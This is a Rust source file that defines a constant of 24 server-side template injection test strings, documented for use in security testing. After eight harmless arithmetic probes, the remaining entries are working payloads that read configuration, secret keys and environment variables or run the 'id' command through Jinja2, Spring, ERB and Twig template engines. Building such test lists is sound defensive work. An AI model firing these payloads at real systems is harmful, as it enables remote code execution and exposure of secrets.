/// Server-side template injection (SSTI) test strings: 24 entries separated
/// by `\n`, with no trailing newline, so `SSTI.lines()` yields one entry per
/// pattern.
///
/// The first eight entries are the arithmetic expression `7*7` written in
/// different template delimiter styles; they have no side effects, and a
/// response carrying a computed value rather than the literal text means the
/// input reached a template evaluator. The remaining entries reference
/// configuration, settings or environment objects, or try to run the `id`
/// command, so responses and logs collected while using them can contain
/// secrets, and a vulnerable target will spawn a process.
///
/// The last entry indexes `__subclasses__()` with the hard-coded value `396`;
/// that position depends on the interpreter version and the modules loaded,
/// so a miss on that entry alone is not evidence that input is handled safely.
///
/// Each source line below holds exactly one entry; the trailing `\` continues
/// the literal without adding characters to the value.
pub const SSTI: &str = "\
    {{7*7}}\n\
    {{7*\'7\'}}\n\
    ${7*7}\n\
    <%=7*7%>\n\
    #{7*7}\n\
    *{7*7}\n\
    @(7*7)\n\
    ~[7*7]\n\
    {{config}}\n\
    {{config.items()}}\n\
    {{settings}}\n\
    {{settings.SECRET_KEY}}\n\
    {{self._TemplateReference__context}}\n\
    {{request.application.__globals__.__builtins__.__import__(\'os\').popen(\'id\').read()}}\n\
    ${T(java.lang.Runtime).getRuntime().exec(\'id\')}\n\
    ${T(java.lang.System).getenv()}\n\
    #{T(java.lang.Runtime).getRuntime().exec(\'id\')}\n\
    <%= system(\'id\') %>\n\
    <%= `id` %>\n\
    {{_self.env.registerUndefinedFilterCallback(\'exec\')}}{{_self.env.getFilter(\'id\')}}\n\
    {{[\'id\']|filter(\'system\')}}\n\
    {{[\'id\']|map(\'system\')|join}}\n\
    {{config.__class__.__init__.__globals__[\'os\'].popen(\'id\').read()}}\n\
    {{\'\'.__class__.mro()[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].strip()}}";
Server-side template injection (SSTI) payloads: 24 newline-separated patterns.